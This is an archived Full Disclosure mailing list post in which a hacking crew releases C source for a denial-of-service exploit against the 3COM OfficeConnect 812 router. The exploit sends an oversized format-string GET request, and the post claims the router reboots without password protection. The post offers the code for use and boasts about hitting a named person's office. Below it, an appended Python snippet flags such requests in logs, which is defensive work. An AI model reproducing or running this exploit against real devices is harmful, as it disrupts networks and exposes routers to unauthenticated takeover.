Full Disclosure mailing list archives
[ElectronicSouls] - 3COM OfficeConnect 812 DoS
From: es () hush com
Date: Fri, 29 Nov 2002 12:44:15 -0800
Dear List,

Here's a little 0day we wrote to DoS the 3COM OfficeConnect, which is what
BuRn-X uses at his office. After successful exploitation, the router will
reboot, with no password protection. <EG>.

# cat ES3comFsck.c
/*********************************************************\
 * !! ELECTRONIC-SOULS CREW ONLY !!
 *
 * !! - DO NOT DISTRIBUTE !!
 *
 * 3COM OfficeConnect 812 DoS
 * ..but hey this isnt just a dumb DoS, the router will restart
 * and be up without any password protection in like 2 mins ;)
 * (C) BrainStorm [ElectronicSouls]
 *
\*********************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define BOLD "\033[00;01m"
#define RED "\033[01;31m"
#define NORM "\033[00;00m"
#define GREEN "\033[01;32m"

int main(int argc, char **argv[])
{
    struct sockaddr_in sin;
    struct hostent *host;
    char buf[8192];
    int sock, rt, len;

    if (argc != 2) {
        printf(BOLD"[!] Usage: %s <host>\n"NORM,argv[0]);
    }

    host = gethostbyname((void *)argv[1]);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&(sin.sin_zero), 8);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
    sin.sin_port = htons(80);

    rt = connect(sock, (void *)&sin, sizeof(sin));
    if (rt == -1) {
        perror(RED"[*] Connecting.."NORM);
        exit(1);
    }

    printf(GREEN"[!] Connected to %s\n"NORM, argv[1]);
    memset(&buf, 0, sizeof(buf));
    sprintf(buf, "GET /graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s HTTP/1.0\n\n", argv[1]);
    printf(GREEN"[] Sending overflow string..\n"NORM, argv[1]);
    send(sock, buf, sizeof(buf), 0);

    while (1) {
        memset(&buf, 0, sizeof(buf));
        len = sizeof(buf);
        rt = read(sock, &buf, len);
        if (rt <= 0)
            exit(0);
        printf(GREEN"%s\n"NORM, buf);
    }
    printf(NORM"\n");
}
#

Enjoy!

The Electronic Souls Team
[ElectronicSouls] (c) 2002

"<dvorak> probably is the real ES archive"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
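
Added example (not part of the original post or the authors' code): the request above carries a long run of "%s" sequences in the URI, which are not valid percent-escapes, so a log or proxy check can flag such request lines before they reach an embedded web interface. The function names, the threshold and the sample request lines are assumptions constructed for this illustration.

```python
import re

# RFC 3986: "%" is only legal in a URI as "%" plus two hex digits.
VALID_PCT = re.compile(r"%[0-9A-Fa-f]{2}")
# A bare printf-style conversion left over once valid escapes are masked.
PRINTF_CONV = re.compile(r"%[sdiouxXcnp]")
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>.+) HTTP/\d\.\d$")

PRINTF_THRESHOLD = 4  # assumption: tune against local traffic


def score_target(target):
    """Return (invalid_escapes, printf_like) for one request target."""
    # Mask valid escapes with "_" so neighbours cannot fuse into new ones.
    residue = VALID_PCT.sub("_", target)
    return residue.count("%"), len(PRINTF_CONV.findall(residue))


def inspect_request_line(line):
    """Classify one raw HTTP request line; None if it does not parse."""
    m = REQUEST_LINE.match(line.strip())
    if m is None:
        return None
    invalid, printf_like = score_target(m.group("target"))
    return {
        "target": m.group("target"),
        "invalid_escapes": invalid,
        "printf_like": printf_like,
        "alert": printf_like >= PRINTF_THRESHOLD,
    }


# Constructed sample request lines (not captured traffic).
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /search?q=100%25%20off HTTP/1.1",
    "GET /a%zz HTTP/1.0",
    "GET /graphics/sml3com%s%s%s%s%s%s HTTP/1.0",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request_line(sample))
```

A sequence such as "%dd" is a valid escape and is not counted, so the printf_like figure is a lower bound; the invalid_escapes count is the stricter signal for targets that should never contain a bare "%".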